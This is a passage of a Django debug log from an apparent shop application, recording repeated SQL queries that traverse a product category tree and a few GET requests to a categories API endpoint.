FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:38:04,525 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:38:04,527 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:38:04,530 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:38:04,532 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:38:04,534 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:38:04,537 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:38:04,539 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:38:04,541 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:38:04,543 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:38:04,548 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:38:04,552 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:38:04,554 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:38:04,556 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:38:04,559 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:38:04,561 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:38:04,563 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:38:04,566 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:38:04,568 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:38:04,570 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:38:04,573 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:38:04] "GET /api/v1/categories/ HTTP/1.0" 200 8596 DEBUG 2019-12-13 13:38:12,455 utils 19021 139703114565376 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 13:38:12,463 utils 19021 139703114565376 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 13:38:12] "GET /api/v1/categories/10 HTTP/1.0" 200 183 DEBUG 2019-12-13 13:38:12,471 utils 19021 139703101101824 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:38:12,477 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:38:12,480 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:38:12,482 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:38:12,485 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:38:12,488 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:38:12,490 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:38:12,492 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:38:12,495 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:38:12,498 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:38:12,500 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:38:12,502 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:38:12,504 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:38:12,507 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:38:12,511 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:38:12,513 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:38:12,515 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:38:12,517 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:38:12,519 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:38:12,522 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:38:12,524 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:38:12,526 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:38:12,529 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:38:12,531 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:38:12,533 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:38:12,535 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:38:12,537 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:38:12,540 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:38:12,542 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:38:12,544 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:38:12,546 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:38:12,548 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:38:12,551 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:38:12,553 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:38:12,555 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:38:12,558 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:38:12,560 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:38:12,562 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:38:12,564 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:38:12,566 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:38:12,569 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:38:12,571 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:38:12,573 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:38:12,575 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:38:12,577 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:38:12,580 utils 19021 